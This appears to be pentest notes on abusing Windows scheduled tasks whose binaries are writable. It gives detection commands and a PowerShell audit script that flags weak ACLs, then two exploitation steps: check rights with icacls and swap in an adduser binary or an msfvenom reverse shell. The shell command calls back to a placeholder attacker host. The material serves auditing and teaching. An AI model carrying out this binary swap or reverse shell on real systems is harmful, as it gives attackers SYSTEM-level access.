Scheduled Tasks

Rare Vector

Detection

# Generally look at backup-related entries; otherwise there is a lot of noise

schtasks /query /fo LIST /v
# Look in Author, TaskName, Task To Run, Run As User, and Next Run Time fields.

OR

# PowerShell
Get-ScheduledTask | ft TaskName,TaskPath,State
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
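
# Audit sketch (added example, not part of the original notes): for every non-Microsoft task, resolve the binary it runs and report ACL entries that let a low-privileged principal change it, which is the same condition the icacls step below checks by hand. The principal list, the rights mask and the helper name Resolve-TaskBinary are assumptions made for this example.

```powershell
# Principals treated as low-privileged (assumption; extend for your environment).
$lowPriv = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users',
             [System.Security.Principal.WindowsIdentity]::GetCurrent().Name)
# Write-type bits only. Modify and FullControl contain these; ReadAndExecute does not.
$writeBits = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'

# Hypothetical helper: turn a task's Execute string into a full path to an existing file.
function Resolve-TaskBinary([string]$Execute) {
    $path = [Environment]::ExpandEnvironmentVariables($Execute.Trim('"'))
    if (-not [IO.Path]::IsPathRooted($path)) {
        # Bare names such as "cmd.exe" are resolved through PATH.
        $cmd = Get-Command -Name $path -CommandType Application -ErrorAction SilentlyContinue |
               Select-Object -First 1
        if ($cmd) { $path = $cmd.Path }
    }
    if (Test-Path -LiteralPath $path -PathType Leaf) { $path }
}

$findings = foreach ($task in Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft*' }) {
    # COM handler actions have no Execute property and are skipped.
    foreach ($action in $task.Actions | Where-Object { $_.Execute }) {
        $binary = Resolve-TaskBinary $action.Execute
        if (-not $binary) { continue }
        # Check the binary and its folder: a writable folder also allows swapping the file.
        foreach ($target in $binary, (Split-Path -Parent $binary)) {
            $acl = Get-Acl -LiteralPath $target -ErrorAction SilentlyContinue
            if (-not $acl) { continue }
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -eq 'Allow' -and
                    $lowPriv -contains $ace.IdentityReference.Value -and
                    (([int]$ace.FileSystemRights -band $writeBits) -ne 0)) {
                    [pscustomobject]@{
                        TaskName = $task.TaskName
                        RunAs    = $task.Principal.UserId
                        Target   = $target
                        Identity = $ace.IdentityReference.Value
                        Rights   = $ace.FileSystemRights
                    }
                }
            }
        }
    }
}
$findings | Sort-Object TaskName, Target, Identity -Unique | Format-Table -AutoSize -Wrap
```

# Any row where RunAs is SYSTEM or an administrator account should have the write-type rights removed from the listed identity.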

Exploitation

1) icacls <file.exe> # Do we have (M)odify or (F)ull control as BUILTIN\Users or our own username?
2) Replace the file directly with adduser.exe or an msfvenom shell:
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<> -f exe -o Common.exe
